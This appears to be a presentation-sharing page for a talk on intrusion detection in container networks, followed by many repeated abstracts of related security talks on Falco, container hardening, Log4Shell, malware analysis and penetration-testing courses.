This presentation covers my research into the comparative efficacy assessment of various free and open source intrusion detection and analysis platforms and methods as applied to traditional vs. Linux container networks.
Object Broker Infrastructure for Wide Area NetworksVaidas Brundza
This document summarizes the OBIWAN platform, a middleware platform that aims to make programming distributed applications easier. It does this by providing an object broker infrastructure, automatic replication of objects, distributed garbage collection, and a security framework. The platform is paradigm flexible and allows programmers to choose the programming model best suited to their application. It also details some of the key data structures and algorithms used in distributed garbage collection and security.
While there have been many improvements around securing containers, there is still a large gap in monitoring the behavior of containers in production. That is the reason we created Falco, the open source behavioral activity monitor for containerized environments.
Falco can detect and alert on anomalous behaviour at the application, file system and network level.
In this session we get a deep dive into Falco and explain the following points:
* How does behavioral security differ from existing security solutions like image scanning, seccomp, SELinux or AppArmor?
* How Falco does its magic?
* What Falco can detect? Creating your own rules and customize the existing ones for your Kubernetes applications.
* How to deploy Falco in your Kubernetes cluster?
* Reacting to security incidents, what we can do to stop the attackers in real-time?
* Post-mortem analysis and forensics on containers with Sysdig Inspect. Even when containers does not exist anymore!
The document discusses incident response in cyber-relevant time and the need for automation and standardization to enable faster response times. It introduces OpenC2 as an emerging open standard for command and control that aims to provide unambiguous machine-to-machine communication through a common language and protocols. OpenC2 focuses on the "acting" portion of cyber defense by coordinating defensive actions across different security systems through open specifications.
Ian Powers is seeking a position in information and cyber security. He has a Bachelor of Science in Cyber Security & Intelligence from Embry-Riddle Aeronautical University with a 3.833 GPA. His relevant coursework includes intro to cyber security, malware analysis, computer forensics, and networking security. He has experience attending security conferences and speaking on password security. Currently, he leads a cyber security group focused on competitions and gives lectures on security tools.
Implementing Active Security with Sysdig Falco - Barcelona Software CraftersNéstor Salceda
Woah! We have our application deployed in a cluster and ready to manage or fleet of containers. And is really awesome, we can scale them automatically! But, but... WTF?! What does it mean this message about "File below a known binary directory opened for writing"? Which container opened a file under /bin to write in among the other 9813 containers in my deployment?
When you are managing a Docker cluster with a lot of nodes and containers, finding which one originates the alert may be cumbersome. Time matters and the faster we can react to a security issue the better to avoid greater damage.
Automation is an important point in DevSecOps mindset, and in this talk we are going to learn how to implement custom playbooks with Open Source Software and deploy it using serverless technology for deploying an active security system which uses Sysdig Falco for detecting security threats.
Docker containers are the most popular containerisation technology. Used properly can increase level of security (in comparison to running application directly on the host). On the other hand some misconfigurations can lead to downgrade level of security or even introduce new vulnerabilities.
As delivered by Tim Mackey, Senior Technical Evangelist - Black Duck Software, at LinuxCon and ContainerCon in Berlin 2016.
Traditionally, when datacenter operators talk about application security, they've tended to focus on issues related to key management, firewalls and data access. By contrast, application developers have a security focus which is more aligned with code analysis and fuzzing techniques.
The reality is, secure application deployment principles extend from the infrastructure layer through the application and include how the application is deployed. With the prevalence of continuous deployment of micro-services, it’s imperative to focus efforts on what attackers’ view as vulnerable; particularly in an environment where new exploits are being disclosed almost daily.
In this session we’ll present:
• How known vulnerabilities can make their way into production deployments
• How deployment of vulnerable code can be minimized
• How to determine the vulnerability status of a container
• How to determine the risk associated with a specific package
Keeping Up with the Adversary: Creating a Threat-Based Cyber TeamPriyanka Aash
With advanced cyber-actors evolving quickly and becoming more stealthy, it has become imperative to question the status quo of our existing cyber-operations. This session will outline how a case study and incident response led to changes in focus and philosophy and how that changed the structure of Defensive Cyber Operations.
(Source: RSA Conference USA 2017)
Object Broker Infrastructure for Wide Area NetworksVaidas Brundza
This document summarizes the OBIWAN platform, a middleware platform that aims to make programming distributed applications easier. It does this by providing an object broker infrastructure, automatic replication of objects, distributed garbage collection, and a security framework. The platform is paradigm flexible and allows programmers to choose the programming model best suited to their application. It also details some of the key data structures and algorithms used in distributed garbage collection and security.
While there have been many improvements around securing containers, there is still a large gap in monitoring the behavior of containers in production. That is the reason we created Falco, the open source behavioral activity monitor for containerized environments.
Falco can detect and alert on anomalous behaviour at the application, file system and network level.
In this session we get a deep dive into Falco and explain the following points:
* How does behavioral security differ from existing security solutions like image scanning, seccomp, SELinux or AppArmor?
* How Falco does its magic?
* What Falco can detect? Creating your own rules and customize the existing ones for your Kubernetes applications.
* How to deploy Falco in your Kubernetes cluster?
* Reacting to security incidents, what we can do to stop the attackers in real-time?
* Post-mortem analysis and forensics on containers with Sysdig Inspect. Even when containers does not exist anymore!
The document discusses incident response in cyber-relevant time and the need for automation and standardization to enable faster response times. It introduces OpenC2 as an emerging open standard for command and control that aims to provide unambiguous machine-to-machine communication through a common language and protocols. OpenC2 focuses on the "acting" portion of cyber defense by coordinating defensive actions across different security systems through open specifications.
Ian Powers is seeking a position in information and cyber security. He has a Bachelor of Science in Cyber Security & Intelligence from Embry-Riddle Aeronautical University with a 3.833 GPA. His relevant coursework includes intro to cyber security, malware analysis, computer forensics, and networking security. He has experience attending security conferences and speaking on password security. Currently, he leads a cyber security group focused on competitions and gives lectures on security tools.
Implementing Active Security with Sysdig Falco - Barcelona Software CraftersNéstor Salceda
Woah! We have our application deployed in a cluster and ready to manage or fleet of containers. And is really awesome, we can scale them automatically! But, but... WTF?! What does it mean this message about "File below a known binary directory opened for writing"? Which container opened a file under /bin to write in among the other 9813 containers in my deployment?
When you are managing a Docker cluster with a lot of nodes and containers, finding which one originates the alert may be cumbersome. Time matters and the faster we can react to a security issue the better to avoid greater damage.
Automation is an important point in DevSecOps mindset, and in this talk we are going to learn how to implement custom playbooks with Open Source Software and deploy it using serverless technology for deploying an active security system which uses Sysdig Falco for detecting security threats.
Docker containers are the most popular containerisation technology. Used properly can increase level of security (in comparison to running application directly on the host). On the other hand some misconfigurations can lead to downgrade level of security or even introduce new vulnerabilities.
As delivered by Tim Mackey, Senior Technical Evangelist - Black Duck Software, at LinuxCon and ContainerCon in Berlin 2016.
Traditionally, when datacenter operators talk about application security, they've tended to focus on issues related to key management, firewalls and data access. By contrast, application developers have a security focus which is more aligned with code analysis and fuzzing techniques.
The reality is, secure application deployment principles extend from the infrastructure layer through the application and include how the application is deployed. With the prevalence of continuous deployment of micro-services, it’s imperative to focus efforts on what attackers’ view as vulnerable; particularly in an environment where new exploits are being disclosed almost daily.
In this session we’ll present:
• How known vulnerabilities can make their way into production deployments
• How deployment of vulnerable code can be minimized
• How to determine the vulnerability status of a container
• How to determine the risk associated with a specific package
Keeping Up with the Adversary: Creating a Threat-Based Cyber TeamPriyanka Aash
With advanced cyber-actors evolving quickly and becoming more stealthy, it has become imperative to question the status quo of our existing cyber-operations. This session will outline how a case study and incident response led to changes in focus and philosophy and how that changed the structure of Defensive Cyber Operations.
(Source: RSA Conference USA 2017)
For further details contact:
N.RAJASEKARAN B.E M.S 9841091117,9840103301.
IMPULSE TECHNOLOGIES,
Old No 251, New No 304,
2nd Floor,
Arcot road ,
Vadapalani ,
Chennai-26.
www.impulse.net.in
Email: ieeeprojects@yahoo.com/ imbpulse@gmail.com
A department seminar I gave at the department of Software, Information Systems Engineering and Cyber, Ben-Gurion University.
Agenda:
- Ways for the Industry to consume an academic research
- Example:
- provable software & security
- Analysis tools demos
- Avispa & Tamarin Prover
- Advanced attacks/analysis/next steps
Under-reported Security Defects in Kubernetes ManifestsAkond Rahman
This presentation discusses how frequently security defects are reported in Kubernetes manifests. The paper was presented at the ICSE EnCycris workshop in 2021.
OTechs Hacking and Penetration Testing (BackTrack/Kali) Training CourseOsman Suliman
This document outlines a 30-hour training course on Kali Linux for system administrators, security professionals, and IT professionals. The course costs SD 3000 per trainee and covers topics such as installing and configuring Kali Linux, building test environments, the penetration testing lifecycle including reconnaissance, scanning, exploitation, and maintaining access, and reporting.
What Questions Do Programmers Ask About Configuration as Code?Akond Rahman
Presented at RCoSE2018. Summary: When working with tools like Puppet, programmers ask a lot of questions related to syntax, feasibility, and security. Despite advancements in Puppet, some fundamental challenges such as feasibility, installation, and security persist. Preprint: https://akondrahman.github.io/papers/rcose2018_cac.pdf.
Vulnerability Detection Based on Git HistoryKenta Yamamoto
This document discusses a methodology for detecting vulnerabilities in software based on analysis of the project's Git history. It proposes an approach called HVD that considers whether lines of code were added or removed in code changes, which could improve precision over existing techniques. An evaluation using a dataset of over 350,000 commits found that HVD increased the area under the precision-recall curve by 18.8% compared to a baseline that ignores line additions and removals. Features related to computer resources like memory, CPU and networking were found to most significantly contribute to the classification model. The study demonstrates that automatically detecting vulnerabilities from Git data can produce results aligned with human intuition.
Monitoring & Securing Microservices in KubernetesMichael Ducy
Application running in containers provide a myriad of choices to the end developer. But how do you provide the necessary services to monitor and secure these applications running in platforms such as Kubernetes. This presentation covers some common sense principles to monitor and secure your Kubernetes based applications.
For further details contact:
N.RAJASEKARAN B.E M.S 9841091117,9840103301.
IMPULSE TECHNOLOGIES,
Old No 251, New No 304,
2nd Floor,
Arcot road ,
Vadapalani ,
Chennai-26.
www.impulse.net.in
Email: ieeeprojects@yahoo.com/ imbpulse@gmail.com
DESIGN AND IMPLEMENTATION OF DATA ENCRYPTION SOFTWAREAyanda Demilade
This document presents the design and implementation of data encryption software by Ayanda Demilade Isaac. It discusses the background and need for data encryption. The aim is to compare the encryption techniques of Data Encryption Standard (DES), Triple DES (TDES) and Rijndael, and determine which is more efficient. A literature review analyzes the works, limitations and vulnerabilities of each technique. The research methodology involves a comparative analysis of the encryption algorithms. The results show plain text and cipher text figures. It concludes that Rijndael is more efficient than DES and remains unbroken. Future work could benchmark encryption of different media types like video and audio using Rijndael.
Outpost24 webinar mastering container security in modern day dev opsOutpost24
Our cloud security expert examines the security challenges that come with container adoption and unpack the key steps required to integrate and automate container assessment into the DevOps cycle to help developers build and deploy cloud native apps at speed whilst keeping one eye on security.
In the recent years, the traditional application monolith has broken down into a hefty chunk of micro-services thereby increasing the attack surface. We will look at how this increases the entry points into the complex modern day application ecosystem. The modern security tester needs various skills to pen-test such apps including the understanding of containers to successfully break or defend such applications.
When we tie this with the fast paced devOps life cycles for applications and explore the challenges when scaling security for such applications across the organization.
Hence, this webinar discusses traditional and relatively newer methods of Pen-testing web applications. Thereby illustrating how the changing business requirements and Agile life cycles for applications affect Security testing for modern applications.
Key Takeaways:
- what do the traditional Pen testing/Security testing Techniques entail?
- How is the landscape for Applications changing and how it affects security testing?
- What are the key essentials for testing modern applications?
- what can be done to scaling Security Assessments(Testing) for Modern & Agile life cycles?
For organizations and individuals with limited security budgets, successfully hunting for cyber adversaries can be a daunting challenge. Threat Intelligence can be expensive and sometimes
nothing more than IoCs or blacklists. In this talk, Endgame’s threat research team will present a series of techniques that can enable organizations to leverage free or almost-free sources of
data and open-source tools to “hunt on the cheap.” They’ll explain how to: retrieve attackers’ tools from globally distributed honeynets that look like your organization or a juicy launching
point to attackers; enrich the data past basic file/tool hashes to identify malicious command and control IPs/domains through automated binary analysis using open-source sandboxes and tools; and use passive DNS data to identify active infections and enrich existing data sets. Attendees will learn how to apply these three techniques to hunt for adversaries within their own
networks. They will also learn about the various open-source solutions available, such as graph databases, that make these techniques inexpensive and within the scope of many organizations.
Anjum Ahuja, Senior Threat Researcher, Endgame
Jamie Butler, Chief Scientist, Endgame
Andrew Morris, Threat Researcher, Endgame
Virtual Machine Introspection - Future of the CloudTjylen Veselyj
In this presentation I'm talking about feature of VMI technology that are vital for malware analysis, intrusion detection and attack prevention in virtualized environment. This presentation is part of my Ph.D. work and contain summary of VMI state in 2013.
Finding Diversity In Remote Code Injection Exploitsamiable_indian
1. The document analyzes the diversity among remote code injection exploits by collecting exploit samples from network traces, extracting and emulating shellcodes, and clustering the shellcodes based on an exedit distance metric.
2. It finds that exploits can be grouped into families based on the vulnerability targeted. The LSASS and ISystemActivator exploit families show subtle variations among related exploits, while RemoteActivation exploits exhibit more diversity.
3. Analyzing exploit phylogenies reveals code sharing among families and subtle variations within families, providing insights into the emergence of polymorphism in malware payloads.
VERIGRAPH: A pre-deployment verification service for Virtualized Network Functions (aka NFV virtual appliances) running on OpenStack with OPNFV.
Formal Methods: rigorous mathematical methods based on mathematical models for analysing (computer-based) systems
Formal Verification: applied to SDN/NFV-based networks
Verify a formal network model satisfies some invariants or network policies (e.g., absence of loops and black holes, reachability, security policies, etc.)
OpenDaylight Brisbane User Group - OpenDaylight SecurityDavid Jorm
The document discusses OpenDaylight's approach to security. It begins with an introduction to the speaker and an overview of the SDN attack surface. It then discusses recent OpenDaylight vulnerabilities like issues with Netconf and host tracking. Defensive technologies like Topoguard and Security-mode ONOS are presented. The document also covers security response best practices for open source projects and secure engineering practices. It provides an assessment of OpenDaylight's current security status and outlines a vision for improved security response and engineering.
This document summarizes a report by Kaspersky Lab on evolving malware attacks originating in Syria. Malicious actors are using social engineering techniques like Skype messages, Facebook posts, and YouTube videos to distribute malware disguised as security programs. The malware payloads identified include remote access Trojans (RATs) like ShadowTech RAT and Dark Comet RAT. Over 100 malware samples have been found targeting activists and others in Syria, Lebanon, Turkey and other countries. The actors operate from locations including Syria, Russia, and Lebanon, and are constantly evolving their methods.
Malware analysis, threat intelligence and reverse engineeringbartblaze
In this presentation, I introduce the concepts of malware analysis, threat intelligence and reverse engineering. Experience or knowledge is not required.
Feel free to send me feedback via Twitter (@bartblaze) or email.
Blog post: https://bartblaze.blogspot.com/2018/02/malware-analysis-threat-intelligence.html
Labs: https://github.com/bartblaze/MaTiRe
Mind the disclaimer.
The Log4Shell Vulnerability – explained: how to stay secureKaspersky
On December 9th, researchers uncovered a zero-day critical vulnerability in the Apache Log4j library used by millions of Java applications. CVE-2021-44228 or “Log4Shell” is a RCE vulnerability that allows attackers to execute arbitrary code and potentially take full control over an infected system. The vulnerability has been ranked a 10/10 on the CVSSv3 severity scale.
While the Apache Foundation has already released a patch for this CVE, it can take weeks or months for vendors to update their software, and there are already widespread scans being conducted by malicious attackers to exploit Log4Shell.
What should companies or organizations do?
Join Marco Preuss, Head of Europe’s Global Research and Analysis (GReAT) team, Marc Rivero and Dan Demeter, Senior Security Researchers with GReAT, for an in-depth discussion on Log4Shell and a live Q&A session.
To see the full webinar, please visit: https://securelist.com/webinars/log4shell-vulnerability-how-to-stay-secure/?utm_source=Slideshare&utm_medium=partner&utm_campaign=gl_jespo_je0066&utm_content=link&utm_term=gl_Slideshare_organic_s966w1tou5a0snh
This document discusses container security, providing a brief history of containers, security benefits and challenges of containers, and approaches to container vulnerability management and responding to attacks. It notes that while containers are not new, their adoption has increased rapidly in recent years. The document outlines security advantages like smaller surface areas but also challenges like managing vulnerabilities across many moving parts. It recommends strategies like using official images, hardening hosts, scanning for vulnerabilities, and practicing incident response for containers.
This presentation provides an overview of firewalls and their limitations. It discusses how firewalls are designed to control data flows but have hardware, memory, time, and logic constraints. The presentation then demonstrates common attack techniques like impersonation and session hijacking that can bypass firewalls. It shows how easily available hacking tools allow attacks to be performed with little skill or effort. The key point is that while firewalls provide some security, a holistic security program is needed to fully prevent, detect, and respond to threats.
For further details contact:
N.RAJASEKARAN B.E M.S 9841091117,9840103301.
IMPULSE TECHNOLOGIES,
Old No 251, New No 304,
2nd Floor,
Arcot road ,
Vadapalani ,
Chennai-26.
www.impulse.net.in
Email: ieeeprojects@yahoo.com/ imbpulse@gmail.com
A department seminar I gave at the department of Software, Information Systems Engineering and Cyber, Ben-Gurion University.
Agenda:
- Ways for the Industry to consume an academic research
- Example:
- provable software & security
- Analysis tools demos
- Avispa & Tamarin Prover
- Advanced attacks/analysis/next steps
Under-reported Security Defects in Kubernetes ManifestsAkond Rahman
This presentation discusses how frequently security defects are reported in Kubernetes manifests. The paper was presented at the ICSE EnCycris workshop in 2021.
OTechs Hacking and Penetration Testing (BackTrack/Kali) Training CourseOsman Suliman
This document outlines a 30-hour training course on Kali Linux for system administrators, security professionals, and IT professionals. The course costs SD 3000 per trainee and covers topics such as installing and configuring Kali Linux, building test environments, the penetration testing lifecycle including reconnaissance, scanning, exploitation, and maintaining access, and reporting.
What Questions Do Programmers Ask About Configuration as Code?Akond Rahman
Presented at RCoSE2018. Summary: When working with tools like Puppet, programmers ask a lot of questions related to syntax, feasibility, and security. Despite advancements in Puppet, some fundamental challenges such as feasibility, installation, and security persist. Preprint: https://akondrahman.github.io/papers/rcose2018_cac.pdf.
Vulnerability Detection Based on Git HistoryKenta Yamamoto
This document discusses a methodology for detecting vulnerabilities in software based on analysis of the project's Git history. It proposes an approach called HVD that considers whether lines of code were added or removed in code changes, which could improve precision over existing techniques. An evaluation using a dataset of over 350,000 commits found that HVD increased the area under the precision-recall curve by 18.8% compared to a baseline that ignores line additions and removals. Features related to computer resources like memory, CPU and networking were found to most significantly contribute to the classification model. The study demonstrates that automatically detecting vulnerabilities from Git data can produce results aligned with human intuition.
Monitoring & Securing Microservices in KubernetesMichael Ducy
Application running in containers provide a myriad of choices to the end developer. But how do you provide the necessary services to monitor and secure these applications running in platforms such as Kubernetes. This presentation covers some common sense principles to monitor and secure your Kubernetes based applications.
For further details contact:
N.RAJASEKARAN B.E M.S 9841091117,9840103301.
IMPULSE TECHNOLOGIES,
Old No 251, New No 304,
2nd Floor,
Arcot road ,
Vadapalani ,
Chennai-26.
www.impulse.net.in
Email: ieeeprojects@yahoo.com/ imbpulse@gmail.com
DESIGN AND IMPLEMENTATION OF DATA ENCRYPTION SOFTWAREAyanda Demilade
This document presents the design and implementation of data encryption software by Ayanda Demilade Isaac. It discusses the background and need for data encryption. The aim is to compare the encryption techniques of Data Encryption Standard (DES), Triple DES (TDES) and Rijndael, and determine which is more efficient. A literature review analyzes the works, limitations and vulnerabilities of each technique. The research methodology involves a comparative analysis of the encryption algorithms. The results show plain text and cipher text figures. It concludes that Rijndael is more efficient than DES and remains unbroken. Future work could benchmark encryption of different media types like video and audio using Rijndael.
Outpost24 webinar mastering container security in modern day dev opsOutpost24
Our cloud security expert examines the security challenges that come with container adoption and unpack the key steps required to integrate and automate container assessment into the DevOps cycle to help developers build and deploy cloud native apps at speed whilst keeping one eye on security.
In the recent years, the traditional application monolith has broken down into a hefty chunk of micro-services thereby increasing the attack surface. We will look at how this increases the entry points into the complex modern day application ecosystem. The modern security tester needs various skills to pen-test such apps including the understanding of containers to successfully break or defend such applications.
When we tie this with the fast paced devOps life cycles for applications and explore the challenges when scaling security for such applications across the organization.
Hence, this webinar discusses traditional and relatively newer methods of Pen-testing web applications. Thereby illustrating how the changing business requirements and Agile life cycles for applications affect Security testing for modern applications.
Key Takeaways:
- what do the traditional Pen testing/Security testing Techniques entail?
- How is the landscape for Applications changing and how it affects security testing?
- What are the key essentials for testing modern applications?
- what can be done to scaling Security Assessments(Testing) for Modern & Agile life cycles?
For organizations and individuals with limited security budgets, successfully hunting for cyber adversaries can be a daunting challenge. Threat Intelligence can be expensive and sometimes
nothing more than IoCs or blacklists. In this talk, Endgame’s threat research team will present a series of techniques that can enable organizations to leverage free or almost-free sources of
data and open-source tools to “hunt on the cheap.” They’ll explain how to: retrieve attackers’ tools from globally distributed honeynets that look like your organization or a juicy launching
point to attackers; enrich the data past basic file/tool hashes to identify malicious command and control IPs/domains through automated binary analysis using open-source sandboxes and tools; and use passive DNS data to identify active infections and enrich existing data sets. Attendees will learn how to apply these three techniques to hunt for adversaries within their own
networks. They will also learn about the various open-source solutions available, such as graph databases, that make these techniques inexpensive and within the scope of many organizations.
Anjum Ahuja, Senior Threat Researcher, Endgame
Jamie Butler, Chief Scientist, Endgame
Andrew Morris, Threat Researcher, Endgame
Virtual Machine Introspection - Future of the CloudTjylen Veselyj
In this presentation I'm talking about feature of VMI technology that are vital for malware analysis, intrusion detection and attack prevention in virtualized environment. This presentation is part of my Ph.D. work and contain summary of VMI state in 2013.
Finding Diversity In Remote Code Injection Exploitsamiable_indian
1. The document analyzes the diversity among remote code injection exploits by collecting exploit samples from network traces, extracting and emulating shellcodes, and clustering the shellcodes based on an exedit distance metric.
2. It finds that exploits can be grouped into families based on the vulnerability targeted. The LSASS and ISystemActivator exploit families show subtle variations among related exploits, while RemoteActivation exploits exhibit more diversity.
3. Analyzing exploit phylogenies reveals code sharing among families and subtle variations within families, providing insights into the emergence of polymorphism in malware payloads.
VERIGRAPH: A pre-deployment verification service for Virtualized Network Functions (aka NFV virtual appliances) running on OpenStack with OPNFV.
Formal Methods: rigorous mathematical methods based on mathematical models for analysing (computer-based) systems
Formal Verification: applied to SDN/NFV-based networks
Verify a formal network model satisfies some invariants or network policies (e.g., absence of loops and black holes, reachability, security policies, etc.)
OpenDaylight Brisbane User Group - OpenDaylight SecurityDavid Jorm
The document discusses OpenDaylight's approach to security. It begins with an introduction to the speaker and an overview of the SDN attack surface. It then discusses recent OpenDaylight vulnerabilities like issues with Netconf and host tracking. Defensive technologies like Topoguard and Security-mode ONOS are presented. The document also covers security response best practices for open source projects and secure engineering practices. It provides an assessment of OpenDaylight's current security status and outlines a vision for improved security response and engineering.
This document summarizes a report by Kaspersky Lab on evolving malware attacks originating in Syria. Malicious actors are using social engineering techniques like Skype messages, Facebook posts, and YouTube videos to distribute malware disguised as security programs. The malware payloads identified include remote access Trojans (RATs) like ShadowTech RAT and Dark Comet RAT. Over 100 malware samples have been found targeting activists and others in Syria, Lebanon, Turkey and other countries. The actors operate from locations including Syria, Russia, and Lebanon, and are constantly evolving their methods.
Malware analysis, threat intelligence and reverse engineeringbartblaze
In this presentation, I introduce the concepts of malware analysis, threat intelligence and reverse engineering. Experience or knowledge is not required.
Feel free to send me feedback via Twitter (@bartblaze) or email.
Blog post: https://bartblaze.blogspot.com/2018/02/malware-analysis-threat-intelligence.html
Labs: https://github.com/bartblaze/MaTiRe
Mind the disclaimer.
The Log4Shell Vulnerability – explained: how to stay secureKaspersky
On December 9th, researchers uncovered a zero-day critical vulnerability in the Apache Log4j library used by millions of Java applications. CVE-2021-44228 or “Log4Shell” is a RCE vulnerability that allows attackers to execute arbitrary code and potentially take full control over an infected system. The vulnerability has been ranked a 10/10 on the CVSSv3 severity scale.
While the Apache Foundation has already released a patch for this CVE, it can take weeks or months for vendors to update their software, and there are already widespread scans being conducted by malicious attackers to exploit Log4Shell.
What should companies or organizations do?
Join Marco Preuss, Head of Europe’s Global Research and Analysis (GReAT) team, Marc Rivero and Dan Demeter, Senior Security Researchers with GReAT, for an in-depth discussion on Log4Shell and a live Q&A session.
To see the full webinar, please visit: https://securelist.com/webinars/log4shell-vulnerability-how-to-stay-secure/?utm_source=Slideshare&utm_medium=partner&utm_campaign=gl_jespo_je0066&utm_content=link&utm_term=gl_Slideshare_organic_s966w1tou5a0snh
This document discusses container security, providing a brief history of containers, security benefits and challenges of containers, and approaches to container vulnerability management and responding to attacks. It notes that while containers are not new, their adoption has increased rapidly in recent years. The document outlines security advantages like smaller surface areas but also challenges like managing vulnerabilities across many moving parts. It recommends strategies like using official images, hardening hosts, scanning for vulnerabilities, and practicing incident response for containers.
This presentation provides an overview of firewalls and their limitations. It discusses how firewalls are designed to control data flows but have hardware, memory, time, and logic constraints. The presentation then demonstrates common attack techniques like impersonation and session hijacking that can bypass firewalls. It shows how easily available hacking tools allow attacks to be performed with little skill or effort. The key point is that while firewalls provide some security, a holistic security program is needed to fully prevent, detect, and respond to threats.
This presentation provides an overview of firewalls and their limitations. It discusses how firewalls are designed to control data flows but have hardware, memory, time, and logic constraints. The presentation then demonstrates common attack techniques like impersonation and session hijacking that can bypass firewalls. It shows how easily available hacking tools allow attacks to be performed with little skill or effort. The key point is that while firewalls provide some security, a holistic security program is needed to fully prevent, detect, and respond to threats.
This presentation provides an overview of firewalls and their limitations. It discusses how firewalls are designed to control data flows but have hardware, memory, time, and logic constraints. The presentation then demonstrates common attack techniques like impersonation and session hijacking that can bypass firewalls. It shows how easily available hacking tools allow attacks to be performed with little skill or effort. The conclusion is that firewalls must be part of a comprehensive security program, as they cannot prevent, detect, or respond to attacks alone.
An Attacker Looks at Docker: Approaching Multi-Container ApplicationsPriyanka Aash
Containerization, such as that provided by Docker, is becoming very popular among developers of large-scale applications. This is likely to make life a lot easier for attackers.
While exploitation and manipulation of traditional monolithic applications might require specialized experience and training in the target languages and execution environment, applications made up of services distributed among multiple containers can be effectively explored and exploited "from within" using many of the system- and network-level techniques that attackers, such as penetration testers, already know.
The goal of this talk is to provide a penetration tester experienced in exploitation and post-exploitation of networks and systems with an exposure to containerization and the implications it has on offensive operations. Docker is used as a concrete example for the case study. A penetration tester can expect to leave this presentation with a practical exposure to multi-container application post-exploitation that is as buzzword-free as is possible with such a trendy topic.
An Attacker Looks at Docker: Approaching Multi-Container ApplicationsPriyanka Aash
"Containerization, such as that provided by Docker, is becoming very popular among developers of large-scale applications. The good news: this is likely to make your life easier as an attacker.
While exploitation and manipulation of traditional monolithic applications might require specialized experience and training in the target languages and execution environment, applications made up of services distributed among multiple containers can be effectively explored and exploited ""from within"" using many of the system- and network-level techniques that attackers, such as penetration testers, already know.
The goal of this talk is to provide a hacker experienced in exploitation and post-exploitation of networks and systems with an exposure to containerization and the implications it has on offensive operations. Docker is used as a concrete example for the case study. A hacker can expect to leave this presentation with a practical exposure to multi-container application post-exploitation."
Too soft[ware defined] networks SD-Wan vulnerability assessmentSergey Gordeychik
This document discusses security assessments of software-defined wide area networks (SD-WANs). It begins with an introduction to SD-WAN features and architectures. It then outlines the researchers' approach, which involves examining the SD-WAN attack surface and testing for security issues. The document summarizes potential threats in areas like the control plane, data plane, and virtual network functions. It also provides the perspectives of different roles involved in SD-WANs, such as network engineers, software architects, and security analysts. The researchers conducted a security assessment of SD-WAN that involved examining access control, platform security, management interfaces, and other components.
This document provides an overview of an offensive cyber security engineer training program offered by infosectrain.com. The 120-hour instructor-led online program includes training in ethical hacking, penetration testing, cyber security tools and techniques. It aims to provide students with skills in areas like reconnaissance, scanning, vulnerability analysis, exploitation, post-exploitation, and reporting. The program covers topics such as Active Directory penetration testing, password cracking, and privilege escalation. It includes hands-on labs and prepares students for the EC-Council Certified Ethical Hacker certification exam.
The Offensive Cyber Security Certification will upgrade your skills to become a pentester, exploit developer. You will learn multiple offensive approaches to access infrastructure, environment, and information, performing risk analysis and mitigation, compliance, and much more with this program.
The Offensive Cyber Security Certification will upgrade your skills to become a pentester, exploit developer. You will learn multiple offensive approaches to access infrastructure, environment, and information, performing risk analysis and mitigation, compliance, and much more with this program.
https://www.infosectrain.com/courses/offensive-cyber-security-engineer-training/
Cem Gurkok presented on containers and security. The presentation covered threats to containers like container exploits and tampering of images. It discussed securing the container pipeline through steps like signing, authentication, and vulnerability scans. It also covered monitoring containers and networks, digital forensics techniques, hardening containers and hosts, and vulnerability management.
The SOC analyst training program is meticulously designed by the subject matter experts at Infosec Train. The training program offers a deep insight into the SOC operations and workflows. It is an excellent opportunity for aspiring and current SOC analysts (L1/L2/L3) to level up their skills to mitigate business risks by effectively handling and responding to security threats.
https://www.infosectrain.com/courses/soc-analyst-expert-training/
The SOC analyst training program is meticulously designed by the subject matter experts at Infosec Train. The training program offers a deep insight into the SOC operations and workflows. It is an excellent opportunity for aspiring and current SOC analysts (L1/L2/L3) to level up their skills to mitigate business risks by effectively handling and responding to security threats.
https://www.infosectrain.com/courses/soc-analyst-expert-training/
Mining Software Repositories for Security: Data Quality Issues Lessons from T...CREST
This presentation highlights a range of issues that arise when dealing with data quality, and poses several recommendations, including:
Consideration of Label Noise in Negative Class
• Semi-Supervised, e.g., self-training, positive or Unlabeled training on unlabeled set
• Consideration of Timeliness
• Currently labeled data & more positive samples; Preserve data sequence for training
• Use of Data Visualization
• Try to achieve better data understandability for non data scientists
• Creation and Use of Diverse Language Datasets
• Bug seeding into semantically similar languages
• Use of Data Quality Assessment Criteria
• Determine and use specific data quality assessment approaches
• Better Data Sharing and Governance
Presented by Tim Mackey, Senior Technology Evangelist, Black Duck Software on August 17.
To use containers safely, you need to be aware of potential security issues and the tools you need for securing container-based systems. Secure production use of containers requires an understanding of how attackers might seek to compromise the container, and what you should be aware of to minimize that potential risk.
Tim Mackey, Senior Technical Evangelist at Black Duck Software, provides guidance for developing container security policies and procedures around threats such as:
1. Network security
2. Access control
3. Tamper management and trust
4. Denial of service and SLAs
5. Vulnerabilities
Register today to learn about the biggest security challenges you face when deploying containers, and how you can effectively deal with those threats.
Watch the webinar on BrightTalk: http://bit.ly/2bpdswg
Azure 101: Shared responsibility in the Azure CloudPaulo Renato
Whether you’re working exclusively on Azure or with multiple cloud environments, there are certain things you should consider when moving assets to the public cloud. As with any cloud deployment, security is a top priority, and moving your workloads to the Azure cloud doesn’t mean you’re not responsible for the security of your operating system, applications, and data.
Building on the security of the Azure infrastructure, this shared security responsibility starts with making sure your environment is secure. In this session, we will discuss step-by-step what you need to do to secure access at the administrative, application and network layers.
DCSF19 Container Security: Theory & Practice at NetflixDocker, Inc.
Michael Wardrop, Netflix
Usage of containers has undergone rapid growth at Netflix and it is still accelerating. Our container story started organically with developers downloading Docker and using it to improve their developer experience. The first production workloads were simple batch jobs, pioneering micro-services followed, then status as a first class platform running critical workloads.
As the types of workloads changed and their importance increased, the security of our container ecosystem needed to evolve and adapt. This session will cover some security theory, architecture, along with practical considerations, and lessons we learnt along the way.
Applied Security for Containers, OW2con'18, June 7-8, 2018, ParisOW2
There’s a constant rise of the container usage in the existing cloud ecosystem.
Most companies are evaluating how to migrate to newer, flexible and automated platform for content and application delivery.
The containers are building themselves alone across the business, but who's securing them?
This presentation discusses the evolution of infrastructure solutions from servers to containers, how can they be secured.
What opensource security options are available today?
Where is the future leading towards container security?
What will come after containers?
DevSecCon Tel Aviv 2018 - End2End containers SSDLC by Vitaly DavidoffDevSecCon
This document discusses securing the software development lifecycle (SDLC) when using containers. It begins with an introduction to SDLC models like waterfall and agile. It then covers challenges in applying application security with containers, including unclear boundaries and responsibilities. The main body details how to apply security practices at each phase of the SDLC for containers: requirements, design, implementation, testing, and operations. Key practices include threat modeling, secure coding, image validation, and monitoring. It concludes with emphasizing the importance of involving security champions throughout the process.
Similar to Container intrusions Do You Even IDS (20)
Cosa hanno in comune un mattoncino Lego e la backdoor XZ?Speck&Tech
